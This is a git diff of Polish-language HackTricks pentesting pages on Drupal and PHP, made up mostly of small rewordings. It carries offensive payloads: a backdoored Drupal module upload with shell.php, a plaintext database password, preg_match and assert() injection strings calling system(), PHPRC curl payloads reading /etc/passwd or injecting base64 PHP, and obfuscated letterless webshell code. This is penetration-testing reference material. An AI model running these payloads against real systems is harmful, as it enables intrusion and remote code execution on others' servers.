* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -25,7 +25,7 @@ Inne sposoby wsparcia HackTricks:
```bash
curl https://www.drupal.org/ | grep 'content="Drupal'
```
* **Węzeł**: Drupal **indeksuje swoje treści za pomocą węzłów**. Węzeł może **przechowywać wszystko**, takie jak wpis na blogu, ankieta, artykuł, itp. URI strony mają zazwyczaj formę `/node/<nodeid>`.
* **Węzeł**: Drupal **indeksuje swoją zawartość za pomocą węzłów**. Węzeł może **przechowywać wszystko**, takie jak wpis na blogu, ankieta, artykuł, itp. URI strony mają zazwyczaj formę `/node/<nodeid>`.
```bash
curl drupal-site.com/node/1
```
@ -34,8 +34,8 @@ curl drupal-site.com/node/1
Drupal obsługuje **trzy rodzaje użytkowników** domyślnie:
1. **`Administrator`**: Ten użytkownik ma pełną kontrolę nad stroną internetową Drupal.
2. **`Użytkownik uwierzytelniony`**: Ci użytkownicy mogą zalogować się na stronie i wykonywać operacje, takie jak dodawanie i edytowanie artykułów, w zależności od ich uprawnień.
3. **`Anonimowy`**: Wszyscy odwiedzający stronę są oznaczeni jako anonimowi. Domyślnie tym użytkownikom wolno tylko czytać posty.
2. **`Użytkownik uwierzytelniony`**: Ci użytkownicy mogą zalogować się na stronie internetowej i wykonywać operacje takie jak dodawanie i edytowanie artykułów na podstawie swoich uprawnień.
3. **`Anonimowy`**: Wszyscy odwiedzający stronę internetową są uznawani za anonimowych. Domyślnie tym użytkownikom wolno tylko czytać posty.
### Wersja
@ -99,7 +99,7 @@ droopescan scan drupal -u http://drupal-site.local
### Z modułem PHP Filter
{% hint style="warning" %}
W starszych wersjach Drupal **(przed wersją 8)** było możliwe zalogowanie się jako administrator i **włączenie modułu `PHP filter`**, który "Umożliwia ocenianie osadzonego kodu PHP/skrótów."
W starszych wersjach Drupal **(przed wersją 8)** było możliwe zalogowanie się jako administrator i **włączenie modułu `PHP filter`**, który "Umożliwia ocenienie osadzonego kodu PHP/skrótów."
{% endhint %}
Musisz mieć zainstalowany **plugin php** (sprawdź to przechodząc do _/modules/php_ i jeśli zwraca **403**, to **istnieje**, jeśli **nie znaleziono**, to **plugin php nie jest zainstalowany**)
@ -148,13 +148,13 @@ RewriteEngine On
RewriteBase /
</IfModule>
```
* Konfiguracja powyżej będzie stosować reguły dla folderu /, gdy żądamy pliku w /modules. Skopiuj oba te pliki do folderu captcha i utwórz archiwum.
* Powyższa konfiguracja będzie stosować reguły dla folderu /, gdy żądamy pliku w /modules. Skopiuj oba te pliki do folderu captcha i utwórz archiwum.
```bash
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
```
* Zakładając, że mamy **dostęp administracyjny** do strony internetowej, kliknij **`Zarządzaj`**, a następnie **`Rozszerzenia`** w pasku bocznym. Następnie kliknij przycisk **`+ Zainstaluj nowy moduł`**, i zostaniemy przeniesieni do strony instalacji, takiej jak `http://drupal-site.local/admin/modules/install`. Przejdź do zainfekowanego archiwum Captcha i kliknij **`Zainstaluj`**.
* Po udanej instalacji, przejdź do **`/modules/captcha/shell.php`** aby wykonać polecenia.
* Zakładając, że mamy **dostęp administracyjny** do strony internetowej, klikamy na **`Zarządzaj`**, a następnie na **`Rozszerzenia`** w pasku bocznym. Następnie klikamy przycisk **`+ Zainstaluj nowy moduł`**, i zostaniemy przeniesieni do strony instalacji, na przykład `http://drupal-site.local/admin/modules/install`. Przejdź do zainfekowanego archiwum Captcha i kliknij **`Zainstaluj`**.
* Po udanej instalacji, przejdź do **`/modules/captcha/shell.php`** aby wykonywać polecenia.
## Po Wykorzystaniu
@ -170,7 +170,7 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from
* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}

86
network-services-pentesting/pentesting-web/php-tricks-esp/README.md
View file

@ -7,14 +7,14 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../..https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -38,7 +38,7 @@ Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e
### Luźne porównania/Type Juggling ( == )
Jeśli w PHP używane jest `==`, mogą wystąpić przypadki, w których porównanie nie zachowuje się zgodnie z oczekiwaniami. Dzieje się tak, ponieważ "==" porównuje tylko wartości przekształcone do tego samego typu, jeśli chcesz również porównać, czy typ porównywanych danych jest taki sam, musisz użyć `===`.
Jeśli w PHP używane jest `==`, mogą wystąpić nieoczekiwane przypadki, w których porównanie nie zachowuje się zgodnie z oczekiwaniami. Dzieje się tak, ponieważ "==" porównuje tylko wartości przekształcone do tego samego typu, jeśli chcesz również porównać, czy typ porównywanych danych jest taki sam, musisz użyć `===`.
Tabele porównań w PHP: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
@ -47,11 +47,11 @@ Tabele porównań w PHP: [https://www.php.net/manual/en/types.comparisons.php](h
{% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
* `"string" == 0 -> True` Ciąg znaków, który nie zaczyna się od liczby, jest równy liczbie
* `"0xAAAA" == "43690" -> True` Ciągi złożone z liczb w formacie dziesiętnym lub szesnastkowym można porównać z innymi liczbami/ciągami, uzyskując wynik True, jeśli liczby były takie same (liczby w ciągu są interpretowane jako liczby)
* `"0e3264578" == 0 --> True` Ciąg rozpoczynający się od "0e" i zawierający cokolwiek będzie równy 0
* `"0X3264578" == 0X --> True` Ciąg rozpoczynający się od "0" i zawierający dowolną literę (X może być dowolną literą) oraz cokolwiek będzie równy 0
* `"0xAAAA" == "43690" -> True` Ciągi złożone z liczb w formacie dziesiętnym lub szesnastkowym można porównać z innymi liczbami/ciągami znaków z wynikiem True, jeśli liczby były takie same (liczby w ciągu znaków są interpretowane jako liczby)
* `"0e3264578" == 0 --> True` Ciąg znaków rozpoczynający się od "0e" i zawierający cokolwiek będzie równy 0
* `"0X3264578" == 0X --> True` Ciąg znaków rozpoczynający się od "0" i zawierający dowolną literę (X może być dowolną literą) oraz cokolwiek dalej, będzie równy 0
* `"0e12334" == "0" --> True` Jest to bardzo interesujące, ponieważ w niektórych przypadkach można kontrolować wejściowy ciąg znaków "0" oraz pewną zawartość, która jest haszowana i porównywana do niego. Dlatego jeśli można podać wartość, która spowoduje utworzenie hasza zaczynającego się od "0e" i bez żadnej litery, można ominąć porównanie. Można znaleźć **już zahaszowane ciągi** w tym formacie tutaj: [https://github.com/spaze/hashes](https://github.com/spaze/hashes)
* `"X" == 0 --> True` Dowolna litera w ciągu jest równa liczbie całkowitej 0
* `"X" == 0 --> True` Dowolna litera w ciągu znaków jest równa liczbie całkowitej 0
Więcej informacji na stronie [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09)
@ -74,9 +74,9 @@ if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Re
if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; }
// Real Password
```
### Surowe rzucanie typami
### Surowe rzucanie typu
Nawet jeśli jest używany `===`, mogą wystąpić błędy, które sprawiają, że porównanie jest podatne na surowe rzucanie typami. Na przykład, jeśli porównanie konwertuje dane na inny typ obiektu przed porównaniem:
Nawet jeśli jest używany `===`, mogą wystąpić błędy, które sprawiają, że porównanie jest podatne na **surowe rzucanie typu**. Na przykład, jeśli porównanie **konwertuje dane na inny typ obiektu przed porównaniem**:
```php
(int) "1abc" === (int) "1xyz" //This will be true
```
@ -86,7 +86,7 @@ Nawet jeśli jest używany `===`, mogą wystąpić błędy, które sprawiają,
#### Ominięcie nowej linii
Jednakże, gdy ograniczamy początek wyrażenia regularnego w `preg_match()`, **sprawdza on tylko pierwszą linię danych wprowadzonych przez użytkownika**, więc jeśli w jakiś sposób można **przesłać** dane wejściowe w **kilku liniach**, można ominięć tę kontrolę. Przykład:
Jednakże, gdy ograniczamy początek wyrażenia regularnego `preg_match()` **sprawdza tylko pierwszą linię danych wprowadzonych przez użytkownika**, więc jeśli w jakiś sposób można **przesłać** dane we **wielu liniach**, można ominięć tę kontrolę. Przykład:
```php
$myinput="aaaaaaa
11111111"; //Notice the new line
@ -110,7 +110,7 @@ Znajdź przykład tutaj: [https://ramadistra.dev/fbctf-2019-rceservice](https://
#### **Bypassowanie błędu długości**
(Ten bypass został wypróbowany na PHP 5.2.5 i nie udało mi się go uruchomić na PHP 7.3.15)\
Jeśli możesz przesłać do `preg_match()` **bardzo duże dane wejściowe**, nie będzie w stanie ich przetworzyć, co pozwoli Ci **obejść** sprawdzenie. Na przykład, jeśli jest na czarnej liście JSON, możesz przesłać:
Jeśli możesz przesłać do `preg_match()` **bardzo dużą poprawną wartość wejściową**, nie będzie w stanie jej przetworzyć i będziesz mógł **obejść** sprawdzenie. Na przykład, jeśli jest na czarnej liście JSON, możesz przesłać:
```bash
payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}'
```
@ -123,9 +123,9 @@ Sztuczka z: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-
W skrócie problem występuje, ponieważ funkcje `preg_*` w PHP bazują na [bibliotece PCRE](http://www.pcre.org/). W PCRE pewne wyrażenia regularne są dopasowywane poprzez dużą liczbę wywołań rekurencyjnych, co zużywa dużo miejsca na stosie. Możliwe jest ustawienie limitu na ilość dozwolonych rekursji, ale w PHP ten limit [domyślnie wynosi 100 000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit), co jest więcej niż mieści się na stosie.
[Wątek na Stackoverflow](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) został również podlinkowany w poście, gdzie bardziej szczegółowo omówiono ten problem. Naszym zadaniem było teraz jasne:\
**Wysłać dane wejściowe, które sprawią, że wyrażenie regularne wykona 100 000+ rekursji, powodując SIGSEGV, sprawiając, że funkcja `preg_match()` zwróci `false`, co sprawi, że aplikacja uzna, że nasze dane wejściowe nie są złośliwe, rzucając niespodziankę na końcu ładunku w postaci czegoś w stylu `{system(<bardzozłepolecenie>)}` aby uzyskać SSTI --> RCE --> flaga :)**.
**Wysłać dane wejściowe, które sprawią, że wyrażenie regularne wykona 100 000+ rekursji, powodując SIGSEGV, sprawiając, że funkcja `preg_match()` zwróci `false`, co sprawi, że aplikacja uzna, że nasze dane wejściowe nie są złośliwe, rzucając niespodziankę na końcu ładunku w postaci czegoś takiego jak `{system(<bardzozłepolecenie>)}` aby uzyskać SSTI --> RCE --> flagę :)**.
Cóż, w terminach wyrażeń regularnych, faktycznie nie wykonujemy 100 tys. "rekursji", ale zamiast tego liczymy "kroki wstecz", które, jak podaje [dokumentacja PHP](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit), domyślnie wynos 1 000 000 (1M) w zmiennej `pcre.backtrack_limit`.\
Cóż, w terminach wyrażeń regularnych, faktycznie nie wykonujemy 100 tys. "rekursji", ale zamiast tego liczymy "kroki wstecz", co, jak podaje [dokumentacja PHP](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit), domyślnie wynosi 1 000 000 (1M) w zmiennej `pcre.backtrack_limit`.\
Aby to osiągnąć, `'X'*500_001` spowoduje wykonanie 1 miliona kroków wstecz (500 tys. do przodu i 500 tys. do tyłu):
```python
payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}"
@ -141,9 +141,9 @@ $obfs = 3+2 * (TRUE + TRUE); //int 7
$obfs .= ""; //string "7"
$obfs += ""; //int 7
```
## Wykonaj Po Przekierowaniu (EAR)
## Wykonaj po przekierowaniu (EAR)
Jeśli PHP przekierowuje do innej strony, ale nie jest wywoływana funkcja **`die`** lub **`exit`** po ustawieniu nagłówka `Location`, PHP kontynuuje wykonywanie i dołącza dane do ciała strony:
Jeśli PHP przekierowuje na inną stronę, ale nie jest wywoływana funkcja **`die`** lub **`exit`** po ustawieniu nagłówka `Location`, PHP kontynuuje wykonywanie i dołącza dane do ciała:
```php
<?php
// In this page the page will be read and the content appended to the body of
@ -153,7 +153,7 @@ header('Location: /index.php?page=default.html');
readfile($page);
?>
```
## Wykorzystanie Traversal Path i Inkluzji Plików
## Wykorzystanie Traversal ścieżki i włączenia pliku
Sprawdź:
@ -163,9 +163,9 @@ Sprawdź:
## Więcej sztuczek
* **register\_globals**: W **PHP < 4.1.1.1** lub gdy jest błędnie skonfigurowany, **register\_globals** może być aktywny (lub ich zachowanie jest imitowane). Oznacza to, że w zmiennych globalnych jak $\_GET, jeśli mają wartość np. $\_GET\["param"]="1234", można uzyskać do niej dostęp za pomocą **$param. Dlatego wysyłając parametry HTTP, można nadpisać zmienne**, które są używane w kodzie.
* **Ciasteczka PHPSESSION z tej samej domeny są przechowywane w tym samym miejscu**, dlatego jeśli w obrębie domeny **różne ciasteczka są używane w różnych ścieżkach**, można sprawić, że ścieżka **uzyskuje dostęp do ciasteczka z innej ścieżki**, ustawiając wartość ciasteczka z innej ścieżki.
W ten sposób, jeśli **obie ścieżki uzyskują dostęp do zmiennej o tej samej nazwie**, można sprawić, że **wartość tej zmiennej w ścieżce 1 będzie stosowana do ścieżki 2**. Następnie ścieżka 2 będzie uznawać zmienne ścieżki 1 za ważne (nadając ciasteczku nazwę odpowiadającą jej w ścieżce 2).
* **register\_globals**: W **PHP < 4.1.1.1** lub jeśli jest źle skonfigurowany, **register\_globals** może być aktywny (lub ich zachowanie jest imitowane). Oznacza to, że w zmiennych globalnych jak $\_GET, jeśli mają wartość np. $\_GET\["param"]="1234", można uzyskać do niej dostęp za pomocą **$param. Dlatego wysyłając parametry HTTP, można nadpisać zmienne**, które są używane w kodzie.
* **Ciasteczka PHPSESSION** z tej samej domeny są przechowywane w tym samym miejscu, dlatego jeśli w obrębie domeny **używane są różne ciasteczka w różnych ścieżkach**, można sprawić, że ścieżka **uzyskuje dostęp do ciasteczka z innej ścieżki**, ustawiając wartość ciasteczka z innej ścieżki.
W ten sposób, jeśli **obie ścieżki uzyskują dostęp do zmiennej o tej samej nazwie**, można sprawić, że **wartość tej zmiennej w ścieżce 1 będzie stosowana do ścieżki 2**. Następnie ścieżka 2 uzna za ważne zmienne ścieżki 1 (nadając ciasteczku nazwę odpowiadającą jej w ścieżce 2).
* Gdy masz **nazwy użytkowników** użytkowników maszyny. Sprawdź adres: **/\~\<USERNAME>** aby zobaczyć, czy katalogi php są aktywowane.
* [**LFI i RCE za pomocą opakowań php**](../../../pentesting-web/file-inclusion/)
@ -213,12 +213,12 @@ Ta opcja preg\_replace została **przestarzała od wersji PHP 5.5.0.**
```
### **RCE poprzez Assert()**
Ta funkcja w php pozwala na **wykonanie kodu zapisanego w ciągu znaków**, aby **zwrócić true lub false** (i w zależności od tego zmienić wykonanie). Zazwyczaj zmienna użytkownika zostanie wstawiona w środku ciągu znaków. Na przykład:\
Ta funkcja w php pozwala ci **wykonać kod napisany w postaci ciągu znaków**, aby **zwrócić true lub false** (i w zależności od tego zmienić wykonanie). Zazwyczaj zmienna użytkownika zostanie wstawiona w środku ciągu znaków. Na przykład:\
`assert("strpos($_GET['page']),'..') === false")` --> W tym przypadku, aby uzyskać **RCE**, można:
```
?page=a','NeVeR') === false and system('ls') and strpos('a
```
Będziesz musiał **przerwać** składnię kodu, **dodać** swój **payload**, a następnie ponownie to **naprawić**. Możesz użyć operacji logicznych takich jak "**and" lub "%26%26" lub "|"**. Należy zauważyć, że "or" lub "||" nie działają, ponieważ jeśli pierwszy warunek jest prawdziwy, nasz payload nie zostanie wykonany. Tak samo ";" nie działa, ponieważ nasz payload nie zostanie wykonany.
Będziesz musiał **przerwać** składnię kodu, **dodać** swój **payload**, a następnie ponownie **naprawić**. Możesz użyć operacji logicznych takich jak "**and" lub "%26%26" lub "|"**. Należy zauważyć, że "or" lub "||" nie działają, ponieważ jeśli pierwszy warunek jest prawdziwy, nasz payload nie zostanie wykonany. Podobnie nie działa ";" ponieważ nasz payload nie zostanie wykonany.
**Inną opcją** jest dodanie do ciągu znaków wykonania polecenia: `'.highlight_file('.passwd').'`
@ -252,29 +252,29 @@ Możesz również użyć **//** aby skomentować resztę kodu.
Aby odkryć liczbę nawiasów, które musisz zamknąć:
- `?order=id;}//`: otrzymujemy komunikat o błędzie (`Parse error: syntax error, unexpected ';'`). Prawdopodobnie brakuje nam jednego lub więcej nawiasów.
- `?order=id);}//`: otrzymujemy **ostrzeżenie**. Wygląda na to, że jest to prawidłowe.
- `?order=id);}//`: otrzymujemy **ostrzeżenie**. Wygląda na to, że jest ok.
- `?order=id));}//`: otrzymujemy komunikat o błędzie (`Parse error: syntax error, unexpected ')' i`). Prawdopodobnie mamy za dużo zamykających nawiasów.
### **RCE za pośrednictwem .httaccess**
### **RCE za pomocą .httaccess**
Jeśli możesz **załadować** plik **.htaccess**, możesz **skonfigurować** kilka rzeczy, a nawet wykonać kod (konfigurując, że pliki z rozszerzeniem .htaccess mogą być **wykonywane**).
Jeśli możesz **załadować** plik **.htaccess**, możesz **skonfigurować** kilka rzeczy, a nawet wykonać kod (konfigurując pliki z rozszerzeniem .htaccess do **wykonywania**).
Różne powłoki .htaccess można znaleźć [tutaj](https://github.com/wireghoul/htshells)
### RCE za pośrednictwem zmiennych środowiskowych
### RCE za pomocą zmiennych środowiskowych
Jeśli znajdziesz podatność, która pozwala ci **modyfikować zmienne środowiskowe w PHP** (i inną do wgrywania plików, chociaż po dokładniejszym zbadaniu może to zostać zignorowane), możesz wykorzystać to zachowanie do uzyskania **RCE**.
Jeśli znajdziesz podatność, która pozwala Ci **modyfikować zmienne środowiskowe w PHP** (i inną do wgrywania plików, chociaż po dokładniejszym zbadaniu może to zostać obejścione), możesz wykorzystać to zachowanie do uzyskania **RCE**.
- [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): Ta zmienna środowiskowa pozwala na ładowanie dowolnych bibliotek podczas wykonywania innych binariów (choć w tym przypadku może to nie zadziałać).
- **`PHPRC`** : Wskazuje PHP, **gdzie znajduje się plik konfiguracyjny**, zwykle nazywany `php.ini`. Jeśli możesz wgrać swój własny plik konfiguracyjny, użyj `PHPRC` aby wskazać PHP na niego. Dodaj wpis **`auto_prepend_file`** określający drugi wgrany plik. Ten drugi plik zawiera normalny **kod PHP, który jest następnie wykonywany** przez środowisko PHP przed jakimkolwiek innym kodem.
- [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): Ta zmienna środowiskowa pozwala na ładowanie dowolnych bibliotek podczas wykonywania innych binariów (choć w tym przypadku może nie działać).
- **`PHPRC`** : Wskazuje PHP, **gdzie znajduje się plik konfiguracyjny**, zwykle nazywany `php.ini`. Jeśli możesz wgrać swój własny plik konfiguracyjny, użyj `PHPRC`, aby wskazać PHP na niego. Dodaj wpis **`auto_prepend_file`** określający drugi wgrany plik. Ten drugi plik zawiera normalny **kod PHP, który jest następnie wykonywany** przez środowisko PHP przed jakimkolwiek innym kodem.
1. Wgraj plik PHP zawierający nasz kod powłoki
2. Wgraj drugi plik, zawierający dyrektywę **`auto_prepend_file`** instruującą preprocesor PHP do wykonania pliku wgraliśmy w kroku 1
3. Ustaw zmienną `PHPRC` na plik wgrany w kroku 2.
2. Wgraj drugi plik, zawierający dyrektywę **`auto_prepend_file`** instruującą preprocesor PHP do wykonania pliku, który wgraliśmy w kroku 1
3. Ustaw zmienną `PHPRC` na plik, który wgraliśmy w kroku 2.
- Uzyskaj więcej informacji na temat wykonania tego łańcucha [**z oryginalnego raportu**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/).
- **PHPRC** - kolejna opcja
- Jeśli **nie możesz wgrywać plików**, możesz użyć w FreeBSD pliku "file" `/dev/fd/0`, który zawiera **`stdin`**, będący **treścią** żądania wysłanego do `stdin`:
- `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'`
- Lub aby uzyskać RCE, włącz **`allow_url_include`** i dodaj na początku plik z kodem PHP w **base64**:
- Lub aby uzyskać RCE, włącz **`allow_url_include`** i dodaj plik z **kodem PHP w base64**:
- `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
- Technika [**z tego raportu**](https://vulncheck.com/blog/juniper-cve-2023-36845).
@ -288,9 +288,9 @@ $_COOKIE | if #This mea
```
Jeśli debugujesz aplikację PHP, możesz globalnie włączyć drukowanie błędów w `/etc/php5/apache2/php.ini`, dodając `display_errors = On` i zrestartować apache: `sudo systemctl restart apache2`
### Odszyfrowywanie kodu PHP
### Deobfuskacja kodu PHP
Możesz użyć **strony internetowej** [**www.unphp.net**](http://www.unphp.net) **do odszyfrowania kodu PHP.**
Możesz użyć **strony internetowej** [**www.unphp.net**](http://www.unphp.net) **do deobfuskacji kodu PHP.**
## Owińce i protokoły PHP
@ -298,7 +298,7 @@ Owińce i protokoły PHP mogą pozwolić Ci **obejść zabezpieczenia zapisu i o
## Xdebug nieuwierzytelniona RCE
Jeśli zauważysz, że **Xdebug** jest **włączony** w wyniku `phpconfig()`, powinieneś spróbować uzyskać RCE za pośrednictwem [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
Jeśli zobaczysz, że **Xdebug** jest **włączony** w wyniku `phpconfig()`, powinieneś spróbować uzyskać RCE za pomocą [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
## Zmienne zmiennych
```php
@ -312,9 +312,9 @@ echo "${Da}"; //Drums
echo "$x ${$x}"; //Da Drums
echo "$x ${Da}"; //Da Drums
```
## Wykorzystywanie RCE poprzez nowe $\_GET\["a"]\($\_GET\["b"])
## RCE wykorzystujące nowe $\_GET\["a"]\($\_GET\["b"])
Jeśli na stronie możesz **utworzyć nowy obiekt dowolnej klasy**, możesz uzyskać zdalne wykonanie kodu (RCE). Sprawdź poniższą stronę, aby dowiedzieć się jak:
Jeśli na stronie możesz **utworzyć nowy obiekt dowolnej klasy**, możesz uzyskać RCE, sprawdź następującą stronę, aby dowiedzieć się jak:
{% content-ref url="php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md" %}
[php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md](php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md)
@ -324,7 +324,7 @@ Jeśli na stronie możesz **utworzyć nowy obiekt dowolnej klasy**, możesz uzys
[https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/](https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/)
### Użycie liczby ósemkowej
### Użycie ósemkowego
```php
$_="\163\171\163\164\145\155(\143\141\164\40\56\160\141\163\163\167\144)"; #system(cat .passwd);
```
@ -344,7 +344,7 @@ ${$_}[_](${$_}[__]); // $_GET[_]($_GET[__]);
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); // $_ = '_GET'; $_GET[_]($_GET[__]);
```
Więc jeśli możesz **wykonać dowolny kod PHP bez użycia cyfr i liter**, możesz wysłać żądanie, wykorzystując poniższy payload do wykonania dowolnego kodu PHP:
Więc jeśli możesz **wykonać dowolny kod PHP bez użycia cyfr i liter**, możesz wysłać żądanie, wykorzystując poniższy payload do wykonania arbitralnego kodu PHP:
```
POST: /action.php?_=system&__=cat+flag.php
Content-Type: application/x-www-form-urlencoded
@ -411,7 +411,7 @@ $____.=$__;
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
```
<figure><img src="../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="../../..https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -421,10 +421,10 @@ $___($_[_]); // ASSERT($_POST[_]);
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
</details>

12
network-services-pentesting/pentesting-web/rocket-chat.md
View file

@ -7,14 +7,14 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
